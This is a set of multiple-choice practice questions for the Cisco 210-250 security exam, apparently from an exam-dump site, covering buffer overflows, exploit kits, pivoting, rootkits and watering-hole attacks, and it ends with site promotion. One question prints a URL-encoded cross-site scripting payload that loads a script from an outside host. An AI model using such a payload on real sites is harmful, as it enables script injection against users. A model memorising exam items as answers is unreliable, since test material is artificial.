What is one of the main causes of successful buffer overflow attacks?
A. careless users violating acceptable use policy
B. poorly written application code that does not validate input data size
C. intentional installation of illegitimate software
D. bad luck of the user who falls victim to such an attack
What function is performed by an attacker running"whoami from the command shell?
A. learn which user account that they are running under and the domain it is running under
B. determine the registrant that the domain web services are running under
C. map IP address back to domain names on the network
D. list all users who are logged on to the machine
What is the purpose of an exploit kit in a client-side attack?
A. hides an iframe in a legitimate webpage to redirect the user to an exploit server
B. profiles the user's computer and delivers exploit code to the computer based on its OS, browser, and applications
C. beacons to an attacker's command and control servers, allowing the attacker to issues commands to the user's machine
D. compromises a web-server to carry out DDoS attacks as part of a botnet
How can you protect an organization from pivoting attacks? (Choose four.)
A. use the personal firewall on all the hosts to prevent any outbound access
B. monitor the network closely observe the logs and follow up on anything that looks suspicious
C. keep software updates and security patches current
D. limit user accounts to minimal privileges
E. limit the ability of user machines to interact with each other
How can an organization protect against a privilege escalation attack?
A. Use a common password for multiple accounts so the users do not need to write it down on a sticky note at their desk.
B. Exercise a strong password policy that includes the requirement of unique passwords for multiple accounts.
C. Assign new passwords to employees every 30 days.
D. Use open authentication on wireless and guest networks.
What are the two best ways to protect a device from a rootkit attack? (Choose two.)
A. Do nothing, because rootkits are not common and are difficult to develop.
B. Keep current with software updates and security patches from the vendor.
C. Maintain a strong password policy.
D. Utilize anti-malware, anti-virus, and next generation firewall and IPS services within the network.
Regarding exploit kits, which option explains what a shadow domain is?
A. a second-level domain that is registered by a malicious person using compromised domain registration information from a legitimate site
B. the series of redirects that a web browser goes through when a web page is unavailable due to being moved
C. websites set up by company's information security teams to act as a "honey pot" to catch malicious actors who may try to deface their website
D. domains that are registered with dynamic DNS or fast flux DNS services to keep the domain and IP addresses frequently rotating to prevent detection by scanning tools
Referring to the suspicious URL that is shown below, which three statements are correct? (Choose three.)
http://www.example.com/script.php?data=%3cscript%20src=%22http%3a%2f%2fwww.example1.com%2ftest.js%22%3e%3c%2fscript%3e
A. The www.example.com web server has a vulnerable PHP script.
B. The attacker is attempting to cause the www.example.com web server to execute an external script from the www.example1.com server.
C. The attacker is attempting to hide the attack by encoding part of the URL.
D. The attacker is exploiting a vulnerability in the client web browser using a PHP script.
E. The attacker is using directory traversal to access a directory that is outside of the www.example.com web server's root directory.
When a URL is encoded to hide an attack, what value can the forward slash (/) character be encoded as?
A. %20
B. %2f
C. %3c
D. %5c
How do watering hole attacks avoid detection by scanning services?
A. by focusing the malware of its campaign so that it is only delivered to visitors from the IP address range of the target organization
B. by compromising the web server of an innocent bystander, so that the malware attack cannot be attributed to servers owned by the attacker
C. by compromising DHCP servers of home routers so that the users will be directed to the websites that are compromised by the attacker
D. by delivering email only to valid email addresses that are targeted from a specific list so that the volume of traffic stays low
Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only Cisco exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 210-250 exam preparations and Cisco certification application, do not hesitate to visit our Vcedump.com to find your solutions here.